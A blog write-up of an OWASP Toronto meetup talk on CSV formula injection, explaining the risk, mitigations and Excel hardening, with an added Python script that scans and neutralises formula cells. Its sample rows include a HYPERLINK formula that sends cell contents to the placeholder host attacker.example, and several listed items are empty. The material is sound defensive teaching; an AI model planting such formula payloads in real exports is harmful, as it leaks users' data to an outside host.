OWASP Toronto Chapter - July Meetup

OWASP Toronto

Introduction

The OWASP Toronto Chapter hosted an event sponsored by a couple of employees at Security Compass. Adam Greenhill's presentation, Export to RCE, gives a basic introduction to the risks of untrusted data inside CSV files.

Who is OWASP?

Before we dive into the write-up, for those who don't know what OWASP is: OWASP (The Open Web Application Security Project) is a community-based, not-for-profit charitable organization focused on improving the security of web applications. OWASP's core principle is that all of its material is freely available and accessible to the public, making it possible for anyone to improve their own web application security. OWASP is best known for the OWASP Top 10, its list of the most critical web application security risks.

OWASP Toronto Banner

Overview

Adam is a Senior Security Consultant at Security Compass. His talk focuses on CSV injection and touches on all aspects of the vulnerability: how it works, how to mitigate it, and a quick demo.


What is CSV?

CSV (Comma-Separated Values) is a plain-text file format used to store tabular data, such as the contents of a spreadsheet or a database table. CSV files can be imported into and exported from many programs; the most widely known and used one is Microsoft Excel.


So, what is CSV Injection?

According to OWASP, CSV Injection, also known as formula injection, occurs when a website embeds untrusted input inside a CSV file it generates.


Basically, when a spreadsheet program like Microsoft Excel opens a CSV file, any cell whose value starts with '=' is interpreted by the software as a formula and evaluated, rather than displayed as text. Excel treats cells beginning with '+', '-' or '@' the same way, so a filter that looks for '=' alone is not enough.

Crafted formulas can be used for three key attacks:

Common web apps that utilize CSV files

There are three common kinds of web application that make heavy use of CSV files:


To stay safe, make sure that the CSV files you download from these common websites come from a trusted source and have been checked before you open them in a spreadsheet program.

Mitigating CSV Injection

To remediate the vulnerability, ensure that no cell in the generated CSV file begins with any of the following characters:

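The following is an added example, not code from the talk or from OWASP, that ties together the mechanism described above (a cell starting with a formula trigger is evaluated by Excel), the check a user can run on a downloaded CSV, and the export-side mitigation. It uses only the Python standard library. The set of trigger characters is an assumption on my part, chosen to match the characters OWASP's CSV Injection guidance recommends neutralising (=, +, -, @, tab and carriage return); the sample rows and the host attacker.example are constructed for the demonstration.

```python
import csv
import io

# Leading characters that Excel (and LibreOffice) treat as the start of a
# formula. Assumed here to match the set OWASP's CSV Injection page lists;
# tab and carriage return are included because Excel honours them as triggers too.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value):
    """True if a cell, as Excel sees it after CSV quoting is stripped,
    would be evaluated as a formula instead of shown as text."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Prefix a dangerous cell with a single quote so Excel treats it as text.
    Non-string values (ints, floats, None) are left alone so that a genuine
    negative number such as -5 is not turned into the text '-5."""
    if is_formula_cell(value):
        return "'" + value
    return value


def export_rows(rows, fieldnames, hardened):
    """Render rows to CSV text. hardened=False mirrors a typical vulnerable
    export that writes user input straight into the file; hardened=True
    runs every value through neutralize_cell first."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        if hardened:
            row = {k: neutralize_cell(v) for k, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def scan_csv_for_formulas(csv_text):
    """Check a downloaded CSV before opening it: return (row, column, cell)
    for every cell that a spreadsheet would evaluate. The csv module strips
    the surrounding quotes exactly as Excel would, so a quoted "=1+1" is
    still reported; CSV quoting alone is not a mitigation."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: rows a web app might export if user-supplied fields are
# written into the CSV unchanged. attacker.example is a placeholder host.
FIELDS = ["id", "name", "comment"]
SAMPLE_ROWS = [
    {"id": 1, "name": "Alice", "comment": "first comment, with a comma"},
    {"id": 2, "name": '=HYPERLINK("http://attacker.example/?leak="&A1,"open")',
     "comment": "exfiltrates the contents of A1 via a clickable link"},
    {"id": 3, "name": "Bob", "comment": "+1 looks harmless but is a formula"},
    {"id": 4, "name": "@SUM(1,2)", "comment": "\t=1+1 hides behind a tab"},
]

if __name__ == "__main__":
    unsafe = export_rows(SAMPLE_ROWS, FIELDS, hardened=False)
    safe = export_rows(SAMPLE_ROWS, FIELDS, hardened=True)
    print("Findings in vulnerable export:", scan_csv_for_formulas(unsafe))
    print("Findings in hardened export:  ", scan_csv_for_formulas(safe))
    print(safe)
```

Running the script reports four evaluated cells in the vulnerable export (the HYPERLINK name, the "+1" comment, the "@SUM" name and the tab-prefixed comment) and none in the hardened one. The single-quote prefix is a trade-off: a legitimate user string such as "-5 degrees" also gets the prefix and will show the quote in some viewers, which is why the neutralisation is applied only to strings and not to numeric columns.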

Increase Excel security


To further increase the security of Excel, disable Dynamic Data Exchange (DDE). This protects users from attacks that use DDE to launch commands or spread malware from a crafted cell.

TLDR

  1. Understand the technologies that you’re working with
  2. Sanitize your inputs
  3. Sanitize your outputs
  4. If you're not using it, disable it